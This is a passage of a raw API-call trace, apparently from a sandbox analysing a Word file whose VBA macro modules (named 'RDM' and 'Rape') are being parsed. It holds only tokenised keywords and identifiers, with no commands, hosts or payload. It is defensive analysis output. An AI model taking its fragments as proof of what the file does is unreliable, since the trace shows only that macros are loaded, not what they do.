_Dst=0x7fee3aad150, _DstSize=0x100, _Src="nErrors" | out: _Dst="nErrors") returned 0x0 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastError") returned 0x106802 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Str") returned 0x10d597 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ret") returned 0x10ce15 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dpr") returned 0x1084cc [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="M") returned 0x101064 [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="e") returned 0x10105c [0030.191] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastError") returned 0x106802 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Wend") returned 0x1035a7 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NumOfDeviceNames") returned 0x102896 [0030.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822e96, cbMultiByte=16, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0030.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822e96, cbMultiByte=16, lpWideCharStr=0x76d6148, cchWideChar=16 | out: lpWideCharStr="NumOfDeviceNames") returned 16 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetDeviceName") returned 0x10f552 [0030.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822eca, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0030.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822eca, cbMultiByte=13, lpWideCharStr=0x76d6148, cchWideChar=13 | out: lpWideCharStr="GetDeviceName") returned 13 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="index") returned 0x10bff1 [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.192] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="index") returned 0x10bff1 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.193] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="tmp" | out: _Dst="tmp") returned 0x0 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Str") returned 0x10d597 [0030.193] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rnd") returned 0x10cf52 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.194] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="tmp" | out: _Dst="tmp") returned 0x0 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Right") returned 0x10150d [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Trim") returned 0x10ef40 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plug_error") returned 0x102c90 [0030.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822fba, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0030.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6822fba, cbMultiByte=10, lpWideCharStr=0x766cae8, cchWideChar=10 | out: lpWideCharStr="plug_error") returned 10 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.194] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="tmp" | out: _Dst="tmp") returned 0x0 [0030.194] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="tmp" | out: _Dst="tmp") returned 0x0 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmp") returned 0x10d9eb [0030.194] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="tmp" | out: _Dst="tmp") returned 0x0 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L") returned 0x101063 [0030.194] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LastError") returned 0x106802 [0030.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0030.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.195] CExposedStream::Read () returned 0x0 [0030.195] CExposedStream::Release () returned 0x1 [0030.195] CExposedStream::Release () returned 0x0 [0030.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RDM", cchWideChar=4, lpMultiByteStr=0x2e6560, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDM", lpUsedDefaultChar=0x0) returned 4 [0030.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RDM", cchWideChar=4, lpMultiByteStr=0x2e66a0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDM", lpUsedDefaultChar=0x0) returned 4 [0030.195] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.195] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78379c0 [0030.195] IMalloc:GetSize (This=0x7fefe015380, pv=0x78379c0) returned 0x80 [0030.195] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776bf90 [0030.195] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776c110 [0030.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RDM", cchWideChar=4, lpMultiByteStr=0x2e6560, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDM", lpUsedDefaultChar=0x0) returned 4 [0030.195] CoCreateGuid (in: pguid=0x2e6290 | out: pguid=0x2e6290*(Data1=0x9c4856e2, Data2=0xa05d, Data3=0x42e7, Data4=([0]=0x9c, [1]=0x69, [2]=0x61, [3]=0xb1, [4]=0x53, [5]=0xa1, [6]=0x56, [7]=0x8d))) returned 0x0 [0030.195] CoCreateGuid (in: pguid=0x2e62a0 | out: pguid=0x2e62a0*(Data1=0x83e83eb, Data2=0x8ce9, Data3=0x4b55, Data4=([0]=0x9c, [1]=0xc1, [2]=0x48, [3]=0xe1, [4]=0xd3, [5]=0xdf, [6]=0x91, [7]=0x57))) returned 0x0 [0030.196] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDM", cchWideChar=4, lpMultiByteStr=0x2e62b0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDM", lpUsedDefaultChar=0x0) returned 4 [0030.196] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.196] GetLocalTime (in: lpSystemTime=0x2e6188 | out: lpSystemTime=0x2e6188*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x53)) [0030.196] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c643c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6120, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.196] strcpy_s (in: _Dst=0x7801390, _DstSize=0x4, _Src="RDM" | out: _Dst="RDM") returned 0x0 [0030.196] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.196] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x6a50000 [0030.196] wcscpy_s (in: _Destination=0xb4c6550, _SizeInWords=0x4, _Source="RDM" | out: _Destination="RDM") returned 0x0 [0030.196] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.196] wcscpy_s (in: _Destination=0xb4c6558, _SizeInWords=0x4, _Source="RDM" | out: _Destination="RDM") returned 0x0 [0030.196] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x60) returned 0x77726a0 [0030.197] IMalloc:Free (This=0x7fefe015380, pv=0x78378a0) [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a00 [0030.197] IMalloc:Free (This=0x7fefe015380, pv=0x77726a0) [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb4cfd30 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a00 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb4903f0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78378a0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777faa0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbc0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb51bed0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837a50 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb51c560 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76689d0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fab0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6030 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76689a0 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837ae0 [0030.197] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.197] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.197] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.197] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.197] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.197] CExposedDocFile::AddRef () returned 0x4 [0030.197] CExposedDocFile::AddRef () returned 0x5 [0030.197] CExposedDocFile::OpenStream () returned 0x0 [0030.197] CExposedDocFile::Release () returned 0x4 [0030.197] CExposedStream::Seek () returned 0x0 [0030.197] CExposedStream::AddRef () returned 0x2 [0030.197] CExposedStream::Read () returned 0x0 [0030.197] CExposedStream::AddRef () returned 0x3 [0030.197] CExposedStream::Release () returned 0x2 [0030.197] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb51cbb0 [0030.198] CExposedStream::Read () returned 0x0 [0030.198] CExposedStream::Read () returned 0x0 [0030.198] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.198] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x4) returned 0xb4f6050 [0030.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x8) returned 0xb4f6060 [0030.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f6050, cbMultiByte=4, lpWideCharStr=0xb4f6060, cchWideChar=4 | out: lpWideCharStr="RDM") returned 4 [0030.198] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6050) [0030.198] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6060) [0030.198] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.198] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.198] IMalloc:Alloc (This=0x7fefe015380, cb=0x4e) returned 0x7809000 [0030.199] IMalloc:Alloc (This=0x7fefe015380, cb=0x9c) returned 0xb4c70d0 [0030.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7809000, cbMultiByte=78, lpWideCharStr=0xb4c70d0, cchWideChar=78 | out: lpWideCharStr="0{A8B51617-D780-4867-8250-359E1ED4606D}{398DD4CA-01F3-4391-A152-41466FAD2864}") returned 78 [0030.199] IMalloc:Alloc (This=0x7fefe015380, cb=0x9c) returned 0xb4c7180 [0030.200] IMalloc:Free (This=0x7fefe015380, pv=0x7809000) [0030.200] IMalloc:Free (This=0x7fefe015380, pv=0xb4c70d0) [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0030.200] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0030.201] CExposedStream::Read () returned 0x0 [0030.201] CExposedStream::Release () returned 0x1 [0030.201] CExposedStream::Release () returned 0x0 [0030.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Rape", cchWideChar=5, lpMultiByteStr=0x2e6560, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rape", lpUsedDefaultChar=0x0) returned 5 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Rape", cchWideChar=5, lpMultiByteStr=0x2e66a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rape", lpUsedDefaultChar=0x0) returned 5 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.201] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837b70 [0030.201] IMalloc:GetSize (This=0x7fefe015380, pv=0x7837b70) returned 0x80 [0030.201] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776c290 [0030.201] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776c350 [0030.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Rape", cchWideChar=5, lpMultiByteStr=0x2e6560, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rape", lpUsedDefaultChar=0x0) returned 5 [0030.201] CoCreateGuid (in: pguid=0x2e6290 | out: pguid=0x2e6290*(Data1=0xe225f1f8, Data2=0xeb64, Data3=0x402a, Data4=([0]=0x94, [1]=0xc5, [2]=0xec, [3]=0xb2, [4]=0xd9, [5]=0x74, [6]=0x51, [7]=0x6e))) returned 0x0 [0030.201] CoCreateGuid (in: pguid=0x2e62a0 | out: pguid=0x2e62a0*(Data1=0x5ea31420, Data2=0x7ad5, Data3=0x4cd0, Data4=([0]=0x9f, [1]=0x4, [2]=0xd, [3]=0xd, [4]=0xb2, [5]=0xcf, [6]=0xba, [7]=0xaf))) returned 0x0 [0030.201] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Rape", cchWideChar=5, lpMultiByteStr=0x2e62b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rape", lpUsedDefaultChar=0x0) returned 5 [0030.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.201] GetLocalTime (in: lpSystemTime=0x2e6188 | out: lpSystemTime=0x2e6188*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x63)) [0030.201] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c6564, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="035b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6120, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="035b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.202] strcpy_s (in: _Dst=0x78013a0, _DstSize=0x5, _Src="Rape" | out: _Dst="Rape") returned 0x0 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.202] wcscpy_s (in: _Destination=0xb4c6578, _SizeInWords=0x5, _Source="Rape" | out: _Destination="Rape") returned 0x0 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.202] wcscpy_s (in: _Destination=0xb4c6588, _SizeInWords=0x5, _Source="Rape" | out: _Destination="Rape") returned 0x0 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x6c) returned 0xb46e9b0 [0030.202] IMalloc:Free (This=0x7fefe015380, pv=0xb462300) [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a30 [0030.202] IMalloc:Free (This=0x7fefe015380, pv=0xb46e9b0) [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb5114d0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a30 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0x774eda0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837c00 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fab0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777faa0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb5118b0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837c90 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb511f40 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76688e0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6060 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6050 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x76688b0 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837d20 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.202] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.202] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.202] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.202] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.202] CExposedDocFile::AddRef () returned 0x5 [0030.202] CExposedDocFile::AddRef () returned 0x6 [0030.202] CExposedDocFile::OpenStream () returned 0x0 [0030.202] CExposedDocFile::Release () returned 0x5 [0030.202] CExposedStream::Seek () returned 0x0 [0030.202] CExposedStream::AddRef () returned 0x2 [0030.202] CExposedStream::Read () returned 0x0 [0030.202] CExposedStream::AddRef () returned 0x3 [0030.202] CExposedStream::Release () returned 0x2 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb51ce20 [0030.202] CExposedStream::Read () returned 0x0 [0030.202] CExposedStream::Read () returned 0x0 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0x5) returned 0xb4f6070 [0030.202] IMalloc:Alloc (This=0x7fefe015380, cb=0xa) returned 0xb4904f0 [0030.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb4f6070, cbMultiByte=5, lpWideCharStr=0xb4904f0, cchWideChar=5 | out: lpWideCharStr="Rape") returned 5 [0030.202] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6070) [0030.203] IMalloc:Free (This=0x7fefe015380, pv=0xb4904f0) [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0030.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x28) returned 0x7668850 [0030.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809000 [0030.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7668850, cbMultiByte=40, lpWideCharStr=0x7809000, cchWideChar=40 | out: lpWideCharStr="0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}") returned 40 [0030.203] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809060 [0030.203] IMalloc:Free (This=0x7fefe015380, pv=0x7668850) [0030.203] IMalloc:Free (This=0x7fefe015380, pv=0x7809000) [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0030.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, 